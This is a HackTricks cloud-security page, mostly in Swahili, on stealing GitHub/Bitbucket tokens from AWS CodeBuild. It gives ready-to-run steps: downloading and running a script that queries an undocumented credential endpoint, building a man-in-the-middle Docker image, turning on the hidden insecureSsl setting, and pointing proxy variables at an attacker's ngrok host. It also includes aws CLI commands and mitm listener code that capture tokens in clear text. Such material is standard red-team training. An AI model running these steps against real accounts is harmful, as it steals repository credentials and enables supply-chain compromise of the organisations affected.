AWS Codebuild - Token Leakage

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Pata Github/Bitbucket Tokens zilizosanidiwa

Kwanza, angalia kama kuna source credentials zilizosanidiwa ambazo unaweza leak:

aws codebuild list-source-credentials

Kupitia RCE katika CodeBuild Job

Kutoka ndani ya CodeBuild job, unaweza kufikia endpoint isiyoandikwa ya AWS CodeBuild API ambayo itakurudishia credentials zinazotumika na CodeBuild. Hii inaweza kutumika kupata credentials ambazo CodeBuild job ilianzishwa nazo, mfano AWS CodeConnection credentials, OAUTH au PAT credentials. CodeBuild job haihitaji kuwa privileged ili kufikia endpoint hii na pia ni vigumu kuigundua katika logging na monitoring kwani CodeBuild yenyewe inaita endpoint hii mara kadhaa wakati wa startup.

Mbinu imeelezewa zaidi katika https://thomaspreece.com/2026/03/23/part-2-aws-codebuild-escalating-privileges-via-aws-codeconnections/ lakini kwa muhtasari, ili kupata credentials ndani ya CodeBuild job unahitaji tu kuendesha yafuatayo:

python -m pip install botocore boto3 requests
wget https://raw.githubusercontent.com/thomaspreece/AWS-CodeFactoryTokenService-API/refs/heads/main/GetBuildInfo.py
python ./GetBuildInfo.py

Kupitia Docker Image

Ikiwa utagundua kuwa authentication kwa mfano kwa Github imewekwa kwenye akaunti, unaweza exfiltrate hiyo access (GH token or OAuth token) kwa kufanya Codebuild iitumie specific docker image kuendesha build ya project.

Kwa madhumuni haya unaweza create a new Codebuild project au kubadilisha environment ya ile iliyopo ili kuweka Docker image.

Docker image unaweza kutumia ni https://github.com/carlospolop/docker-mitm. Hii ni Docker image rahisi sana itakayoweka env variables https_proxy, http_proxy na SSL_CERT_FILE. Hii itakuwezesha intercept sehemu kubwa ya trafiki ya host iliyoonyeshwa katika https_proxy na http_proxy na kuamini SSL CERT iliyoonyeshwa katika SSL_CERT_FILE.

  1. Create & Upload your own Docker MitM image
  • Fuata maagizo ya repo ili kuweka proxy IP yako na SSL cert yako na build the docker image.
  • DO NOT SET http_proxy ili kuto-intercept requests kwa metadata endpoint.
  • Unaweza kutumia ngrok kama ngrok tcp 4444 ili kuweka proxy kwa host yako
  • Mara baada ya kuwa umejenga Docker image, upload it to a public repo (Dockerhub, ECR…)
  1. Set the environment
  • Create a new Codebuild project au modify environment ya ile iliyopo.
  • Weka project itumie previously generated Docker image
  1. Set the MitM proxy in your host
  • Kama ilivyoonyeshwa katika Github repo unaweza kutumia kitu kama:
mitmproxy --listen-port 4444  --allow-hosts "github.com"

Tip

The mitmproxy version used was 9.0.1, iliripotiwa kwamba kwa toleo 10 hii inaweza isiwe kazi.

  1. Endesha build & capture the credentials
  • Unaweza kuona token katika kichwa cha Authorization:

Hii pia inaweza kufanywa kutoka kwa aws cli kwa kitu kama

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Kupitia insecureSSL

Codebuild miradi ina setting iitwayo insecureSsl ambayo imefichwa kwenye kiolesura cha wavuti; unaweza kuibadilisha tu kupitia API.
Kuwezesha hili kunaruhusu Codebuild kuunganishwa na repository bila kukagua cheti kinachotolewa na jukwaa.

  • Kwanza unahitaji kuorodhesha usanidi wa sasa kwa kitu kama:
aws codebuild batch-get-projects --name <proj-name>
  • Kisha, kwa taarifa uliyoikusanya unaweza kusasisha mpangilio wa mradi insecureSsl kuwa True. Hapa chini ni mfano wa jinsi nilivyosasisha mradi, angalia insecureSsl=True mwishoni (hii ndicho pekee unachohitaji kubadilisha kutoka kwa usanidi uliokusanywa).
  • Zaidi ya hayo, pia ongeza vigezo vya mazingira http_proxy na https_proxy vinavyoelekeza kwa tcp ngrok yako kama:
aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
}
]
}'

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
  • Mwisho, bonyeza kwenye Build the project, credentials zitatumwa kama clear text (base64) kwenye mitm port:

Kupitia itifaki ya HTTP

[!TIP] > This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can’t abuse it anymore :)

Mshambuliaji mwenye elevated permissions in over a CodeBuild could leak the Github/Bitbucket token iliyosanidiwa, au ikiwa ruhusa zilipangwa kupitia OAuth, temporary OAuth token used to access the code inaweza kuonekana.

  • Mshambuliaji anaweza kuongeza environment variables http_proxy na https_proxy kwenye project ya CodeBuild zikielekeza kwenye mashine yake (kwa mfano http://5.tcp.eu.ngrok.io:14972).
  • Kisha, badilisha URL ya github repo ili itumie HTTP badala ya HTTPS, kwa mfano: http://github.com/carlospolop-forks/TestActions
  • Kisha, endesha mfano wa msingi kutoka https://github.com/synchronizing/mitm kwenye port iliyoonyeshwa na proxy variables (http_proxy and https_proxy)
from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="0.0.0.0",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
  • Ifuatayo, bonyeza Jenga mradi au anza ujenzi kutoka kwenye mstari wa amri:
aws codebuild start-build --project-name <proj-name>
  • Mwisho, nyaraka za uthibitisho zitatumwa kwa maandishi wazi (base64) kwenye mitm port:

Warning

Sasa mshambulizi ataweza kutumia token kutoka kwenye mashine yake, kuorodhesha ruhusa zote zilizo ndani yake na kuitumia (kama kutumia vibaya) kwa urahisi zaidi kuliko kutumia huduma ya CodeBuild moja kwa moja.

Utekelezaji wa PR usioaminifu kupitia usanidi mbaya wa kichujio cha webhook

Kwa mnyororo wa webhook bypass unaochochewa na PR (ACTOR_ACCOUNT_ID regex + untrusted PR execution), angalia:

AWS CodeBuild - Untrusted PR Webhook Bypass (CodeBreach-style)

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks